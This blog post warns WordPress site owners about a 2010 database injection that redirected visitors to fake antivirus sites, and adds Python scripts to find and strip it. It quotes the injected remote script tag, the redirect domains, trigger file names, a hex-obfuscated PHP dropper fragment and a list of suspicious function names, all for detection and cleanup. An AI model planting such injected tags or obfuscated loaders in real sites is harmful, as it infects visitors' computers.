On December 22, 2010, we received several reports that a new malware attack (acrossuniverseitbenet) has infected WordPress sites hosted at GoDaddy and possibly other hosting providers.
The malware script injected is as follows:
(I have put spaces in the url below for your protection so you can't click to open the url.)
<script src="http:// acrossuniverseitbenet .com/js.php?kk=10" > </script>
The worst part about this virus is that it is much harder to clean. The malicious hackers have stepped it up a notch and decided to infect the WordPress database and not just server files. The above script is injected inside every single page and post in the database (wp_posts table).
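As an added example (mine, not code from the original post or from GoDaddy), the following locates and strips the injected tag from the wp_posts table. It runs against an in-memory SQLite copy built from constructed rows, but the LIKE query and the per-row cleanup are the same on the live MySQL table; take a database backup first.

```python
import re
import sqlite3

# Constructed sample rows standing in for wp_posts; the tag is the one quoted above,
# reassembled without the protective spaces so the check is realistic.
SAMPLE_ROWS = [
    (1, "<p>Hello world</p><script src=\"http://acrossuniverseitbenet.com/js.php?kk=10\"></script>"),
    (2, "<p>Clean post</p>"),
    (3, "<script src=\"http://acrossuniverseitbenet.com/js.php?kk=10\"> </script><p>Another</p>"),
]

# The domain is the stable indicator; the kk= value and surrounding whitespace may vary.
INJECTED_TAG = re.compile(
    r'<script\s+src=["\']https?://\s*acrossuniverseitbenet\s*\.com/js\.php\?kk=\d+["\']\s*>\s*</script>',
    re.IGNORECASE,
)

def load_sample_db():
    """Build an in-memory wp_posts-like table from the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_content TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?)", SAMPLE_ROWS)
    return conn

def find_infected(conn):
    """IDs of posts that reference the malicious domain; the same SELECT works on MySQL."""
    rows = conn.execute(
        "SELECT ID FROM wp_posts WHERE post_content LIKE '%acrossuniverseitbenet%' ORDER BY ID"
    ).fetchall()
    return [r[0] for r in rows]

def clean_posts(conn):
    """Strip the injected tag from every post that carries it; returns rows changed."""
    changed = 0
    for post_id, content in conn.execute("SELECT ID, post_content FROM wp_posts").fetchall():
        cleaned, hits = INJECTED_TAG.subn("", content)
        if hits:
            conn.execute("UPDATE wp_posts SET post_content = ? WHERE ID = ?", (cleaned, post_id))
            changed += 1
    conn.commit()
    return changed

if __name__ == "__main__":
    db = load_sample_db()
    print("infected before:", find_infected(db))
    print("rows cleaned:", clean_posts(db))
    print("infected after:", find_infected(db))
```

Re-run the SELECT after cleaning; anything still listed carries a variant of the tag that the pattern did not match and needs a look by hand.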
This malicious script redirects website visitors to various “Fake AV” websites, and some of these are zero-day attacks. A zero-day attack means that anti-virus programs may not yet have their definitions updated, so your computer can become infected even with up-to-date software.
Some of the Fake AV websites that the acrossuniverseitbenet redirects to are:
(I have put spaces in the urls so you can't click them for your protection.)
- ww23.smartsuite-4u .in
- ww3.top-s-can-foru .in
- www1.top-only-master .in
Here's a screen shot of one of the viruses caught by my AVG program:
Today, my computer was attacked three times and my AVG and MalwareBytes did not catch two of the viruses and I had to do a system restore to an earlier date.
I did not make a screen shot of the actual attacks, but it looked very similar to this:
As you can see by the above image, this can easily fool people into thinking they are looking at a folder on their Windows computer and not a web browser (look at the top where you can see the URL). It moves extremely fast and starts downloading tons of infectious files to your computer.
This Fake AV is very dangerous and can cripple your visitors' computers. It is strongly advised that you put your website in maintenance mode immediately until it is fixed.
How to safely put your WordPress Blog in Maintenance Mode:
- Rename your root index.php file to something else (for example: index-hold.php).
- Upload a “Down for Maintenance” index.html page to your root directory.
- Rename your wp-config.php file to something else so no other pages connect to the infected database (for example: wp-config-hold.php).
- Clear your cache and cookies.
- Visit your website's home page to make sure you can see the “Down for Maintenance” page.
If you do not have a blank index page, please feel free to use mine. All you have to do is unzip it and upload it to your root directory where your wp-config.php file is.
Important: Make sure you rename it to index.html so that your server recognizes it for the home page.
Server Files Found:
There have been numerous “mystery” files found on infected websites that were uploaded on November 10, 2010. We believe these were trigger files that were set to “go off” today.
An example file name is sdfssdf_dfsdf.php
Be sure you look through your server files for these trigger files and remove them ASAP.
Contact Your Hosting Company
If you're hosted with GoDaddy, please fill out a support ticket with their security team here.
If you are hosting with another hosting provider, please contact them as well.
How many WordPress sites are infected with acrossuniverseitbenet?
At this time, the number of WordPress sites hacked or the number of hosting providers affected is unclear.
We have been working with GoDaddy directly to help resolve this issue and will keep you updated as we receive more information. Any updates will be put on this blog post, so be sure to check back often. If you need help, feel free to contact us.
We need your feedback!
Has your site been infected with this malware attack? If so, are you on GoDaddy or with another hosting provider? Have you found any other redirect scripts? Please let us know by leaving a comment below.
UPDATE: 12/22/2010 at 5pm CST:
Currently, we are unable to connect via FTP/SFTP to any affected site on GoDaddy's servers that is infected with this malware. We are getting a critical error: “550 Login authentication failed. Could not connect to the server.” We had to change the FTP password to get in again. Not sure if it was a malicious hacker that changed it or GoDaddy for protection.
UPDATE 12/22/2010 at 8:27PM CST:
Just found another trigger file on an infected website. File name fritz_rather.php. Uploaded 11/13/2010 at 6:41am server time. This file must have been time-activated to go off today, when the site started redirecting this morning.
You should search your server files for any files that have suspicious names and also do a search for the following to identify any malicious code:
<'.'?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x6
The malicious code could have all or some of the above. They should be deleted immediately.
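An added example (mine, not part of the original post) that does both searches from the updates above at once: it decodes \x hex escapes so a function name hidden the way the snippet above hides it becomes readable, and it lists .php files modified inside an assumed November 2010 window (the trigger files were dated 11/10 and 11/13). It runs here against a constructed temp directory; point scan_php_tree at your document root instead.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# "\x63\x72..." escapes that obfuscated PHP uses to hide which functions it calls.
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
# Names that, once decoded, mark a dropper or backdoor rather than normal WordPress code.
SUSPICIOUS = ("create_function", "eval", "base64_decode", "gzinflate")

def decode_hex_escapes(text):
    """Turn "\\x63\\x72\\x65" into "cre" so a hidden function name becomes readable."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)

def scan_php_tree(root, since, until):
    """Return (relative path, reason) pairs for .php files under root that either hide a
    suspicious function name behind hex escapes or were modified within [since, until]."""
    findings = []
    for dirpath, _, names in sorted(os.walk(root)):
        for name in sorted(names):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "r", errors="replace") as fh:
                raw = fh.read()
            hits = [s for s in SUSPICIOUS if s in decode_hex_escapes(raw)]
            if HEX_ESCAPE.search(raw) and hits:
                findings.append((rel, "hex-escaped " + ",".join(hits)))
            mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
            if since <= mtime <= until:
                findings.append((rel, "modified in window"))
    return findings

def build_sample_tree():
    """Constructed fixture (not real malware): a stand-in trigger file whose body follows the
    snippet quoted above, back-dated to 2010-11-10, beside a clean file with today's mtime."""
    root = tempfile.mkdtemp()
    dropper = os.path.join(root, "sdfssdf_dfsdf.php")
    with open(dropper, "w") as fh:
        fh.write(r'<?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";')
    stamp = datetime(2010, 11, 10, tzinfo=timezone.utc).timestamp()
    os.utime(dropper, (stamp, stamp))
    with open(os.path.join(root, "wp-settings.php"), "w") as fh:
        fh.write('<?php echo "clean file";')
    return root

if __name__ == "__main__":
    window = (datetime(2010, 11, 1, tzinfo=timezone.utc), datetime(2010, 11, 30, tzinfo=timezone.utc))
    for rel, reason in scan_php_tree(build_sample_tree(), *window):
        print(rel, "->", reason)
```

A file flagged only for its mtime can be a legitimate update, so compare it against a clean copy of WordPress or the plugin before deleting; a file flagged for hex-escaped create_function has no business in a normal install.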
UPDATE 12/22/2010 at 9:39pm CST:
As you know we are working hard to fix as many websites as possible. Our good friends over at Sucuri have agreed to take on our overflow sites and get your sites fixed as soon as possible (generally within 4 hours).
You can get your hacked WordPress blog fixed here:
Open the above URL, scroll down to “Have a single site with malware?” and click the “Sign Up” button. And be sure to check out their Sucuri Web Integrity Monitor services for your website. We use it and recommend it to all our customers.
Don't let your customers tell you your site's hacked, let Sucuri alert you instead.
*Denotes our affiliate link, see our Disclosure.
UPDATE 12/23/2010 2:50PM
GoDaddy has released a Security Update on their community blog regarding this malware attack. Read “Security Update: Malware Affecting Some Databases.”